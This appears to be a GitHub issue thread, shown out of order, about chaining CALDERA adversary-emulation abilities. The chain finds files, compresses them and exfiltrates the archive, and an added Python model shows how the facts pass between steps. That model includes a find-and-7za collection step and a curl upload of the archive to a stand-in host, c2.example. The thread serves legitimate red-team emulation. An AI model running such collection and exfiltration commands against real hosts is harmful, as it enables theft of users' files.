Closed rcaroncd closed 4 years ago
host.
and it will only be used on the host it was discovered on, #{host.file.sensitive} for example. Regarding chain attacks, I'd recommend you take a look at how we've constructed some of our demonstration adversaries (hunter and the worm variants).
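To make the point about fact scope concrete, here is an added, self-contained Python model of the pattern this thread is about (find files, compress them, exfiltrate the archive, passing data between phases as facts that stay scoped to the host they came from). It is not CALDERA's code or API and was not written by either participant: the fact store, the `#{trait}` substitution, the parser functions, the trait name `host.archive.path`, the `/tmp/loot.7z` path, the `c2.example` upload URL and the command outputs are all assumptions constructed for the example.

```python
"""Simplified model of data flow between chained abilities via host-scoped facts.

Added illustration, NOT CALDERA's own code: the fact store, the #{...} template
syntax, the parsers and the three abilities are a hypothetical re-creation of
the pattern discussed in the thread (find files -> compress -> exfiltrate).
Trait name host.archive.path, the /tmp/loot.7z path and the c2.example URL
are assumptions chosen for this example.
"""
import itertools
import re
from dataclasses import dataclass
from typing import Callable, Optional

TEMPLATE = re.compile(r"#\{([\w.]+)\}")


@dataclass(frozen=True)
class Fact:
    trait: str
    value: str
    host: str  # the agent the fact was collected from


@dataclass
class Ability:
    name: str
    command: str                             # may reference #{trait}
    parser: Optional[Callable] = None        # turns raw output into Facts


class FactStore:
    def __init__(self):
        self._facts = set()

    def add(self, facts):
        self._facts.update(facts)

    def for_host(self, host, trait):
        """Facts are scoped to the host they were discovered on."""
        return sorted(f.value for f in self._facts
                      if f.host == host and f.trait == trait)


def render_links(ability, store, host):
    """Expand the command once per combination of matching facts for `host`.

    An ability that needs a trait the host has no fact for yields no link at
    all, so nothing is ever run with an empty placeholder.
    """
    traits = list(dict.fromkeys(TEMPLATE.findall(ability.command)))
    if not traits:
        return [ability.command]
    value_sets = [store.for_host(host, t) for t in traits]
    if any(not values for values in value_sets):
        return []
    commands = []
    for combo in itertools.product(*value_sets):
        mapping = dict(zip(traits, combo))
        commands.append(TEMPLATE.sub(lambda m: mapping[m.group(1)], ability.command))
    return commands


def parse_file_paths(output, host):
    """File-finder parser: one absolute path per output line becomes a fact."""
    return [Fact("host.file.sensitive", line.strip(), host)
            for line in output.splitlines() if line.strip()]


def parse_archive_path(output, host):
    """Compressor parser: the single output line is the archive path."""
    path = output.strip()
    return [Fact("host.archive.path", path, host)] if path else []


# One link per matching fact: 7za's 'a' command appends, so every file found
# ends up in the same archive, which then becomes a single exfiltration link.
FIND = Ability("file finder", "find /home -name '*.pdf' -type f", parse_file_paths)
COMPRESS = Ability("compress", "7za a /tmp/loot.7z #{host.file.sensitive}", parse_archive_path)
EXFIL = Ability("http exfil", "curl -F data=@#{host.archive.path} http://c2.example/file/upload")

# Constructed (fake) command output standing in for real agent results.
CONSTRUCTED_OUTPUT = {
    ("file finder", "hostA"): "/home/alice/tax-2019.pdf\n/home/alice/passport.pdf\n",
    ("compress", "hostA"): "/tmp/loot.7z\n",
    ("file finder", "hostB"): "",            # nothing found on hostB
}


def run_chain(store, host, outputs):
    """Drive the three phases for one host; return the concrete commands sent."""
    executed = []
    for ability in (FIND, COMPRESS, EXFIL):
        for cmd in render_links(ability, store, host):
            executed.append(cmd)
            if ability.parser:
                store.add(ability.parser(outputs.get((ability.name, host), ""), host))
    return executed


if __name__ == "__main__":
    shared = FactStore()
    for h in ("hostA", "hostB"):
        print(h, run_chain(shared, h, CONSTRUCTED_OUTPUT))
```

Running it shows hostA producing one compress link per discovered path, then a single exfiltration link for the archive, while hostB, which found nothing, never gets a compress or exfil link even though the store already holds hostA's facts.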
Okay, I've reviewed your answer, I'll explain:
The file compression ability is one of my own that I created with 7za. I'll check the yaml, but with what you said about the 'scope variables' (which are limited to one machine) I think that solves my problem.
I'll review the existing adversaries and see if I can clear up my doubts. Thank you very much for the information provided.
Greetings
@rcaroncd let us know if there's anything else on this topic you want to revisit
Hello, I'm doing tests to perform chained attacks, and I'm encountering problems in passing data from one attack to another. I will explain this using the following combined attack as an example: "File Finder + Compressing + HTTP Exfiltration".
This adversary would use 3 phases, one attack in each phase, and they would be as follows:
The idea is that in the first attack a series of files are obtained (absolute paths); there is already an ability for this attack, but I've modified it so that it doesn't just show the first 5 files found. The idea is that I pass those paths to the next attack, which receives them and compresses them into a 7z file. After that, the resulting 7z file path is passed to the next attack, which exfiltrates it via HTTP to Caldera's server.
I have encountered several problems here:
I find problems like these for different multi-phase attacks that I'm trying to implement (e.g. dump tickets + pass the ticket + lateral movement with WMI), and I'm having a hard time trying to reproduce the behavior of an attacker.
I'm probably doing something wrong, or I'm missing something, but I think the documentation is still in progress and there's not much detail about how to pass data between attacks, or how to use facts, relationships, and parsers.
Is it possible to implement this sort of attack chain in CALDERA as of today? How can it be done?
Thanks in advance and thank you very much for the great work you're doing.